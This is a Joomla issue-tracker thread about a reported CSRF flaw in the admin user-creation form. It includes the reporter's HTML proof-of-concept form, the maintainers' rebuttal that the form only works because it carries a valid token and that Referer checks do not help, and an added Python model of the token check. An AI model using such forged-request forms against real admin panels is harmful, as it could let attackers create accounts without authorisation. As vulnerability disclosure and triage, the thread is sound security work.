### Steps to reproduce the issue
After the administrator has logged in, open this page:

```html
<html>
<body>
<form action="http://172.16.100.15/cms/administrator/index.php?option=com_users&layout=edit&id=0" method="POST" enctype="multipart/form-data">
<input type="hidden" name="jform[name]" value="test" />
<input type="hidden" name="jform[username]" value="test" />
<input type="hidden" name="jform[password]" value="test" />
<input type="hidden" name="jform[password2]" value="test" />
<input type="hidden" name="jform[email]" value="test2@qq.com" />
<input type="hidden" name="jform[registerDate]" value=" " />
<input type="hidden" name="jform[lastvisitDate]" value=" " />
<input type="hidden" name="jform[lastResetTime]" value=" " />
<input type="hidden" name="jform[resetCount]" value="0" />
<input type="hidden" name="jform[sendEmail]" value="0" />
<input type="hidden" name="jform[block]" value="0" />
<input type="hidden" name="jform[requireReset]" value="0" />
<input type="hidden" name="jform[id]" value="0" />
<input type="hidden" name="jform[groups][]" value="2" />
<input type="hidden" name="jform[params][admin_style]" value=" " />
<input type="hidden" name="jform[params][admin_language]" value=" " />
<input type="hidden" name="jform[params][language]" value=" " />
<input type="hidden" name="jform[params][editor]" value=" " />
<input type="hidden" name="jform[params][timezone]" value=" " />
<input type="hidden" name="task" value="user.apply" />
<input type="hidden" name="c974c45d533f4be963804a5d041a86a8" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```

A user is added.

Recommended fix: verify the HTTP Referer field.
| Field | Old value | New value |
|---|---|---|
| Status | New | Closed |
| Closed_Date | 0000-00-00 00:00:00 | 2019-10-21 03:02:30 |
| Closed_By | | yuzezheng416 |
| Status | Closed | New |
| Closed_Date | 2019-10-21 03:02:30 | |
| Closed_By | yuzezheng416 | |
I can successfully add a user in the local test, emm, it lacks verification of the HTTP Referer field.
But you're logged in as admin?
> I can successfully add a user in the local test
With the form shown above? Yes, of course you can, because it has a valid CSRF token! Remove that field from your payload and you won't be able to add a user because the token check fails.
Side note:
> Verify the HTTP Referer field
Verifying the referrer field does not protect you against CSRF attacks because the referrer is a user-supplied input and can be easily changed to a value of your choice.
| Field | Old value | New value |
|---|---|---|
| Status | New | Closed |
| Closed_Date | 0000-00-00 00:00:00 | 2019-10-21 08:14:56 |
| Closed_By | | SniperSister |
This IS the CSRF token and it's properly checked in the controller task, see
https://github.com/joomla/joomla-cms/blob/3.10-dev/libraries/src/MVC/Controller/FormController.php#L627
Am I missing something?
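To make the maintainers' point concrete, here is an added Python model (not code from this thread or from Joomla) of the session-bound form token that `FormController::save()` checks via `checkToken()`: the token is the *name* of a hidden POST field (the `c974c45d...` field in the report, sent with value `1`), derived from the site secret and the caller's session token. The site secret and session identifiers below are constructed; `user_apply` and `poc_form` are hypothetical helpers that rebuild the reported form.

```python
import hashlib
import secrets
from typing import Optional

# Constructed value for this example; a real site's secret differs.
SITE_SECRET = "example-site-secret"


def form_token(secret: str, session_token: str) -> str:
    """Model of Joomla's Session::getFormToken(): md5(site secret + session token)."""
    return hashlib.md5((secret + session_token).encode()).hexdigest()


def check_token(session_token: str, post: dict) -> bool:
    """Model of Session::checkToken('post'): the token names a POST field that
    must be present with a non-empty value (the reported form sends "1")."""
    return bool(post.get(form_token(SITE_SECRET, session_token)))


def user_apply(session_token: str, post: dict) -> str:
    """Simulate task=user.apply: refuse before touching the user table unless the
    request carries the token bound to the submitting browser's own session."""
    if not check_token(session_token, post):
        return "rejected: invalid token"
    return "user added: " + post["jform[username]"]


def poc_form(token_field: Optional[str]) -> dict:
    """Rebuild the hidden fields of the reported form, with or without a token field."""
    post = {"jform[name]": "test", "jform[username]": "test", "jform[password]": "test",
            "jform[password2]": "test", "jform[email]": "test2@qq.com",
            "jform[groups][]": "2", "task": "user.apply"}
    if token_field is not None:
        post[token_field] = "1"   # value is irrelevant; the field name is the token
    return post


def demo() -> dict:
    admin_session = secrets.token_hex(16)            # constructed admin session id
    own_token = form_token(SITE_SECRET, admin_session)
    other_token = form_token(SITE_SECRET, secrets.token_hex(16))
    return {
        # The reporter's form, built with a token copied from their own session: succeeds.
        "with_own_token": user_apply(admin_session, poc_form(own_token)),
        # The same form served from a foreign origin cannot know that token: rejected.
        "without_token": user_apply(admin_session, poc_form(None)),
        # A token valid for some other session does not match the admin's: rejected.
        "foreign_token": user_apply(admin_session, poc_form(other_token)),
    }
```

The Referer header would not add anything here: the check already fails for any request that does not originate from a page rendered inside the admin's own session.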